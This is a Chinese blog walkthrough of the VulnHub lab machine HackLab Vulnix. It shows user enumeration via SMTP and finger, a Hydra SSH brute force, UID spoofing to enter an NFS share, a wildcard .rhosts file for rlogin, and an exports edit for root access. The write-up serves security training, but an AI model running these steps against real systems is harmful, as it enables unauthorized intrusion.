vulnhub渗透日记12：HACKLAB_VULNIX

最新推荐文章于 2024-07-25 17:17:57 发布

_WHOAM1

最新推荐文章于 2024-07-25 17:17:57 发布

阅读量95

点赞数

分类专栏： Vulnhub靶机渗透日记文章标签： web安全 linux

本文链接：https://blog.csdn.net/ericalezl/article/details/131919650

版权

Vulnhub靶机渗透日记专栏收录该内容

22 篇文章 0 订阅

订阅专栏

前言

⏰时间：2023.7.25
🗺️靶机地址：https://www.vulnhub.com/entry/hacklab-vulnix,48/
⚠️文中涉及操作均在靶机模拟环境中完成，切勿未经授权用于真实环境。
🙏本人水平有限，如有错误望指正，感谢您的查阅！
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

主机发现

PS D:\> nmap -sn 192.168.58.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-24 15:31 中国标准时间
Nmap scan report for 192.168.58.158
Host is up (0.00s latency).
MAC Address: 00:0C:29:75:FA:A0 (VMware)
Nmap scan report for 192.168.58.254
Host is up (0.00s latency).
MAC Address: 00:50:56:E2:C0:4E (VMware)
Nmap scan report for 192.168.58.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 10.88 seconds

目标是192.168.58.158

端口信息

┌──(root㉿kali)-[~]
└─# nmap -sC -A -T4 -v -p- 192.168.58.158
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: 2023-07-24T13:40:34+00:00; -13h28m33s from scanner time.
| ssl-cert: Subject: commonName=vulnix
| Issuer: commonName=vulnix
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:12
| Not valid after:  2022-08-31T17:40:12
| MD5:   58e3:f1ac:fef6:b6d1:744c:836f:ba24:4f0a
|_SHA-1: 712f:69ba:8c54:32e5:711c:898b:55ab:0a83:44a0:420b
79/tcp    open  finger     Debian fingerd
| finger: Login     Name       Tty      Idle  Login Time   Office     Office Phone\x0D
|_user      user       pts/0      12  Jul 24 14:13 (192.168.58.153)\x0D
110/tcp   open  pop3?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after:  2022-09-02T17:40:22
| MD5:   2b3f:3e28:c85d:e10c:7b7a:2435:c5e7:84fc
|_SHA-1: 4a49:a407:01f1:37c8:81a3:4519:981b:1eee:6856:348e
|_ssl-date: 2023-07-24T13:40:34+00:00; -13h28m33s from scanner time.
111/tcp   open  rpcbind    2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      47672/udp   mountd
|   100005  1,2,3      51054/tcp6  mountd
|   100005  1,2,3      56745/udp6  mountd
|   100005  1,2,3      58830/tcp   mountd
|   100021  1,3,4      51480/udp   nlockmgr
|   100021  1,3,4      53518/udp6  nlockmgr
|   100021  1,3,4      56179/tcp6  nlockmgr
|   100021  1,3,4      59578/tcp   nlockmgr
|   100024  1          33552/tcp   status
|   100024  1          50259/udp   status
|   100024  1          50837/tcp6  status
|   100024  1          58901/udp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
|_ssl-date: 2023-07-24T13:40:34+00:00; -13h28m33s from scanner time.
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after:  2022-09-02T17:40:22
| MD5:   2b3f:3e28:c85d:e10c:7b7a:2435:c5e7:84fc
|_SHA-1: 4a49:a407:01f1:37c8:81a3:4519:981b:1eee:6856:348e
512/tcp   open  exec       netkit-rsh rexecd
513/tcp   open  login
514/tcp   open  tcpwrapped
993/tcp   open  ssl/imap   Dovecot imapd
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after:  2022-09-02T17:40:22
| MD5:   2b3f:3e28:c85d:e10c:7b7a:2435:c5e7:84fc
|_SHA-1: 4a49:a407:01f1:37c8:81a3:4519:981b:1eee:6856:348e
|_ssl-date: 2023-07-24T13:40:35+00:00; -13h28m33s from scanner time.
995/tcp   open  ssl/pop3s?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after:  2022-09-02T17:40:22
| MD5:   2b3f:3e28:c85d:e10c:7b7a:2435:c5e7:84fc
|_SHA-1: 4a49:a407:01f1:37c8:81a3:4519:981b:1eee:6856:348e
|_ssl-date: 2023-07-24T13:40:35+00:00; -13h28m33s from scanner time.
2049/tcp  open  nfs        2-4 (RPC #100003)
32816/tcp open  mountd     1-3 (RPC #100005)
33552/tcp open  status     1 (RPC #100024)
49576/tcp open  mountd     1-3 (RPC #100005)
58830/tcp open  mountd     1-3 (RPC #100005)
59578/tcp open  nlockmgr   1-4 (RPC #100021)
MAC Address: 00:0C:29:75:FA:A0 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Uptime guess: 0.022 days (since Tue Jul 25 10:37:49 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -13h28m33s, deviation: 0s, median: -13h28m33s

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms 192.168.58.158

NSE: Script Post-scanning.
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.59 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

SMTP

┌──(eric㉿kali)-[/]
└─$ smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t 192.168.58.158 -p 25 2>&1
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/top-usernames-shortlist.txt
Target count ............. 1
Username count ........... 17
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Tue Jul 25 11:35:15 2023 #########
192.168.58.158: root exists
192.168.58.158: user exists
######## Scan completed at Tue Jul 25 11:35:15 2023 #########
2 results.

17 queries in 1 seconds (17.0 queries / sec)

可以看到存在user用户
之前看到nmap探测25端口smtp存在vulnix，看是否存在用户vulnix

┌──(eric㉿kali)-[/]
└─$ smtp-user-enum -M VRFY -u vulnix -t 192.168.58.158 -p 25 2>&1
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Tue Jul 25 11:35:48 2023 #########
192.168.58.158: vulnix exists
######## Scan completed at Tue Jul 25 11:35:48 2023 #########
1 results.

1 queries in 1 seconds (1.0 queries / sec)

finger信息枚举

set rhostsmsf6 auxiliary(scanner/finger/finger_users) > set rhosts 192.168.58.158
rhosts => 192.168.58.158
runmsf6 auxiliary(scanner/finger/finger_users) > run
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: backup
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: bin
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: daemon
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: games
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: gnats
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: irc
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: landscape
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: libuuid
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: list
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: lp
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: mail
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: dovecot
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: man
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: messagebus
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: news
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: nobody
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: postfix
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: proxy
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: root
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: sshd
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: sync
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: sys
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: syslog
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: user
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: dovenull
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: uucp
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: whoopsie
[+] 192.168.58.158:79     - 192.168.58.158:79 - Found user: www-data
[+] 192.168.58.158:79     - 192.168.58.158:79 Users found: backup, bin, daemon, dovecot, dovenull, games, gnats, irc, landscape, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, proxy, root, sshd, sync, sys, syslog, user, uucp, whoopsie, www-data
[*] 192.168.58.158:79     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

┌──(eric㉿kali)-[/]
└─$ finger user@192.168.58.158
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull                         Name: Dovecot login user
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.

┌──(eric㉿kali)-[/]
└─$ finger vulnix@192.168.58.158
Login: vulnix                           Name:
Directory: /home/vulnix                 Shell: /bin/bash
Never logged in.
No mail.
No Plan.

可以看到user和vulnix的shell是/bin/bash，是可以登录的
可以对user用户进行ssh爆破

SSH爆破

hydra -l user -P /usr/share/wordlists/rockyou.txt -e nsr ssh://192.168.58.158
[22][ssh] host: 192.168.58.158   login: user   password: letmein

┌──(root㉿kali)-[~]
└─# ssh user@192.168.58.158
user@192.168.58.158's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Jul 24 14:13:47 BST 2023

  System load:  0.0              Processes:           90
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 6%               IP address for eth0: 192.168.58.158
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

user@vulnix:~$ getent passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false

可以确定vulnix用户uid2008

NFS挂载

┌──(eric㉿Eric)-[~]
└─$ sudo showmount -e 192.168.58.158
Export list for 192.168.58.158:
/home/vulnix * #得到挂载目录

┌──(root㉿kali)-[~]
└─# mkdir /tmp/mnt

┌──(root㉿kali)-[~]
└─# mount 192.168.58.158:/home/vulnix /tmp/mnt

┌──(root㉿kali)-[~]
└─# cd /tmp/mnt
cd: permission denied: /tmp/mnt

没权限进入，因为他检测到uid不匹配，所以我们需要进入某个用户查看用户id
我们在本地添加uid为2008的用户vulnix

┌──(root㉿kali)-[~]
└─# useradd -u 2008 vulnix 

┌──(root㉿kali)-[~]
└─# su vulnix
$ cd /tmp/mnt;ls -la
total 20
drwxr-x--- 2 nobody nogroup 4096 Sep  3  2012 .
drwxr-xr-x 3 root   root    4096 Jul 24 22:11 ..
-rw-r--r-- 1 nobody nogroup  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 nobody nogroup 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 nobody nogroup  675 Apr  3  2012 .profile

┌──(root㉿kali)-[~/.ssh]
└─# chsh vulnix -s /bin/bash
#shell类型改为/bin/bash这样好用点

SSH免密登陆

进入了vulnix目录，下面用kali生成的公钥复制到挂载目录的.ssh目录下，命令为authorized_keys

cp ~/.ssh/id_rsa.pub /tmp
su vulnix
mkdir /tmp/mnt/.ssh
cp /tmp/id_rsa.pub /tmp/mnt/.ssh/authorized_keys
ctrl+D #正常退出
ssh vulnix@192.168.58.158

我这里尝试了八万次没成功，不知道什么原因，按理说可以登陆的

RLOGIN登录vulnix

这里我尝试另一种方法登录，前面探测到还有一个服务login，可以通过rlogin命令远程登陆，无需密码
前提是在挂载目录下添加.rhosts文件

echo '+ +' > .rhosts
# 表示允许任何主机的任何用户登录，+这里表示通配符
ctrl+d #正常退出
rlogin 192.168.58.158 -l vulnix

在这里插入图片描述

挂载ROOT

进入后sudo -l
在这里插入图片描述 sudoedit /etc/exports
将这部分改为: /root *(rw, no_root_squash)
保存后需要重启目标机器
重启后看到目标挂载目录变成root

┌──(root㉿kali)-[/home/eric/myfile/NfSpy-master]
└─# mount 192.168.58.158:/root /root

┌──(root㉿kali)-[/home/eric/myfile/NfSpy-master]
└─# cd /root

┌──(root㉿kali)-[~]
└─# ls -la
total 28
drwx------  3 nobody nogroup 4096 Sep  3  2012 .
drwxr-xr-x 19 root   root    4096 Jul 25 11:49 ..
-rw-------  1 nobody nogroup    0 Sep  3  2012 .bash_history
-rw-r--r--  1 nobody nogroup 3106 Apr 19  2012 .bashrc
drwx------  2 nobody nogroup 4096 Sep  3  2012 .cache
-rw-r--r--  1 nobody nogroup  140 Apr 19  2012 .profile
-r--------  1 nobody nogroup   33 Sep  3  2012 trophy.txt
-rw-------  1 nobody nogroup  710 Sep  3  2012 .viminfo

┌──(root㉿kali)-[~]
└─# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be

在这里插入图片描述

_WHOAM1

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
vulnhub渗透日记12：HACKLAB_VULNIX

⏰时间：2023.7.25🗺️靶机地址：https://www.vulnhub.com/entry/hacklab-vulnix,48/⚠️文中涉及操作均在靶机模拟环境中完成，切勿未经授权用于真实环境。
复制链接

扫一扫

专栏目录